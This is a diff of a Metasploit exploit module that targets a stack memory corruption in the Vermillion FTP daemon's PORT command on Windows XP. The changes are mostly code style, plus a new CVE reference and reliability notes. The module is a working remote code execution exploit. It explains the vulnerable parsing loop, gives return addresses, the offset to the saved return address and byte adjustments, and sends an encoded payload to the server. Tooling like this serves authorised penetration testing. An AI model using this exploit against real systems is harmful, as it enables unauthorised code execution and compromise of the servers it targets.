@@ -9,89 +9,95 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Ftp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Vermillion FTP Daemon PORT Command Memory Corruption',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Vermillion FTP Daemon PORT Command Memory Corruption',
+        'Description' => %q{
           This module exploits an out-of-bounds array access in the Arcane Software
-        Vermillion FTP server. By sending a specially crafted FTP PORT command,
-        an attacker can corrupt stack memory and execute arbitrary code.
+          Vermillion FTP server. By sending a specially crafted FTP PORT command,
+          an attacker can corrupt stack memory and execute arbitrary code.
 
-        This particular issue is caused by processing data bound by attacker
-        controlled input while writing into a 4 byte stack buffer. Unfortunately,
-        the writing that occurs is not a simple byte copy.
+          This particular issue is caused by processing data bound by attacker
+          controlled input while writing into a 4 byte stack buffer. Unfortunately,
+          the writing that occurs is not a simple byte copy.
 
-        Processing is done using a source ptr (p) and a destination pointer (q).
-        The vulnerable function walks the input string and continues while the
-        source byte is non-null. If a comma is encountered, the function increments
-        the destination pointer. If an ascii digit [0-9] is encountered, the
-        following occurs:
+          Processing is done using a source ptr (p) and a destination pointer (q).
+          The vulnerable function walks the input string and continues while the
+          source byte is non-null. If a comma is encountered, the function increments
+          the destination pointer. If an ascii digit [0-9] is encountered, the
+          following occurs:
 
           *q = (*q * 10) + (*p - '0');
 
-        All other input characters are ignored in this loop.
+          All other input characters are ignored in this loop.
 
-        As a consequence, an attacker must craft input such that modifications
-        to the current values on the stack result in usable values. In this exploit,
-        the low two bytes of the return address are adjusted to point at the
-        location of a 'call edi' instruction within the binary. This was chosen
-        since 'edi' points at the source buffer when the function returns.
+          As a consequence, an attacker must craft input such that modifications
+          to the current values on the stack result in usable values. In this exploit,
+          the low two bytes of the return address are adjusted to point at the
+          location of a 'call edi' instruction within the binary. This was chosen
+          since 'edi' points at the source buffer when the function returns.
 
-        NOTE: This server can be installed as a service using "vftpd.exe install".
-        If so, the service does not restart automatically, giving an attacker only
-        one attempt.
-      },
-      'Author'         =>
-        [
-          'jduck'   # metasploit module
+          NOTE: This server can be installed as a service using "vftpd.exe install".
+          If so, the service does not restart automatically, giving an attacker only
+          one attempt.
+        },
+        'Author' => [
+          'jduck' # metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
+          [ 'CVE', '2010-20115' ],
           [ 'OSVDB', '62163' ],
           [ 'EDB', '11293' ]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process'
         },
-      'Privileged'     => true,
-      'Payload'        =>
-        {
+        'Privileged' => true,
+        'Payload' => {
           # format string max length
-          'Space'    => 1024,
+          'Space' => 1024,
           'BadChars' => "\x00\x08\x0a\x0d\x2c\xff",
           'DisableNops'	=> true
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
           #
           # Automatic targeting via fingerprinting
           #
-          [ 'Automatic Targeting', { 'auto' => true }  ],
+          [ 'Automatic Targeting', { 'auto' => true } ],
 
           #
           # specific targets
           #
-          [	'vftpd 1.31 - Windows XP SP3 English',
+          [
+            'vftpd 1.31 - Windows XP SP3 English',
             {
               # call edi in vftpd.exe (v1.31)
               'OldRet' => 0x405a73, # not used directly
-              'Ret' 	=> 0x4058e3, # not used directly
+              'Ret' => 0x4058e3, # not used directly
               'Offset' => 16,       # distance to saved return
               'Adders' => "171,48"  # adjust the bottom two bytes
             }
           ]
         ],
-      'DisclosureDate' => '2009-09-23',
-      'DefaultTarget'  => 0))
+        'DisclosureDate' => '2009-09-23',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(21),
-      ])
+      ]
+    )
   end
 
-
   def check
     connect
     disconnect
@@ -99,12 +105,11 @@ class MetasploitModule < Msf::Exploit::Remote
     if banner =~ /\(vftpd .*\)/
       return Exploit::CheckCode::Detected
     end
+
     return Exploit::CheckCode::Safe
   end
 
-
   def exploit
-
     # Use a copy of the target
     mytarget = target
 
@@ -140,7 +145,6 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Trying target #{mytarget.name}...")
     end
 
-
     connect
 
     stuff = payload.encoded
@@ -155,11 +159,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     disconnect
     handler
-
   end
 end
 
-
 =begin
 
 NOTE: the following code was used to obtain the "Adders" target value.
